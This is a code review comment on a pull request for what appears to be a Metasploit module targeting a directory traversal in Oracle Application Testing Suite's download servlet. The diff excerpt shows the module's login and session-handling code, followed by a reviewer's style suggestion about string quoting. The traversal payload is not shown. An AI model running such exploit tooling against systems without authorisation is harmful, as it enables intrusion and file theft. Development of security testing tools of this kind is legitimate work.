modules/auxiliary/gather/oats_downloadservlet_traversal.rb

```diff
@@ -0,0 +1,219 @@
+    auth_spec.afr_window_id = runloopback_args[7].value.scan(/'(.+)'/).flatten.first
+
+    json_args = runloopback_args[17]
+    auth_spec.adf_window_id = json_args.value[4].value.value.to_s
+    auth_spec.adf_page_id = json_args.value[5].value.value.to_s
+  end
+
+  def load_view_redirect_value(res)
+    html = res.get_html_document
+    rk = RKelly::Parser.new
+    script = html.at('script').text
+    ast = rk.parse(script)
+    runredirect = ast.grep(RKelly::Nodes::ExpressionStatementNode).last
+    runredirect_args = runredirect.value.arguments.value
+    redirect_arg = runredirect_args[1].value.scan(/'(.+)'/).flatten.first || ''
+    auth_spec.view_direct = redirect_arg.scan(/ORA_ADF_VIEW_REDIRECT=(\d+);/).flatten.first
+    auth_spec.adf_page_id = redirect_arg.scan(/ORA_ADF_VIEW_PAGE_ID=(s\d+);/).flatten.first
+  end
+
+  def collect_initial_spec
+    uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri,
+    })
+
+    fail_with(Failure::Unknown, 'No response from server') unless res
+    cookies = res.get_cookies
+    session_id = cookies.scan(/JSESSIONID=(.+);/i).flatten.first || ''
+    auth_spec.session_id = session_id
+    load_runloopback_args(res)
+  end
+
+  def prepare_auth_spec
+    collect_initial_spec
+    uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri,
+      'cookie' => "JSESSIONID=#{auth_spec.session_id}",
+      'vars_get' =>
+        {
+          '_afrLoop' => auth_spec.loop_value,
+          '_afrWindowMode' => '0',
+          'Adf-Window-Id' => auth_spec.adf_window_id
+        },
+      'headers' =>
+        {
+          'Upgrade-Insecure-Requests' => '1'
+        }
+    })
+
+    fail_with(Failure::Unknown, 'No response from server') unless res
+    hidden_inputs = res.get_hidden_inputs.first
+    auth_spec.form_value = hidden_inputs['org.apache.myfaces.trinidad.faces.FORM']
+    auth_spec.view_state = hidden_inputs['javax.faces.ViewState']
+  end
+
+  def ota_login!
+    prepare_auth_spec
+    uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'cookie' => "JSESSIONID=#{auth_spec.session_id}",
+      'headers' =>
+        {
+          'Upgrade-Insecure-Requests' => '1'
+        },
+      'vars_post' =>
+        {
+          'userName' => datastore['HttpUsername'],
+          'password' => datastore['HttpPassword'],
+          'org.apache.myfaces.trinidad.faces.FORM' => auth_spec.form_value,
+          'Adf-Window-Id' => auth_spec.adf_window_id,
+          'javax.faces.ViewState' => auth_spec.view_state,
+          'Adf-Page-Id' => auth_spec.adf_page_id,
+          'event' => 'btnSubmit',
+          'event.btnSubmit' => %Q|<m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>|
```

Comment:
Not a big deal, but `'` should be sufficient.

```suggestion
          'event.btnSubmit' => '<m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>'
```

```
irb(main):001:0> puts '<m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>'
<m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>
=> nil
irb(main):002:0> puts %Q|<m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>|
<m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>
=> nil
irb(main):003:0> puts 'same same' if '<m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>' == %Q|<m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>|
same same
=> nil
irb(main):004:0> 
```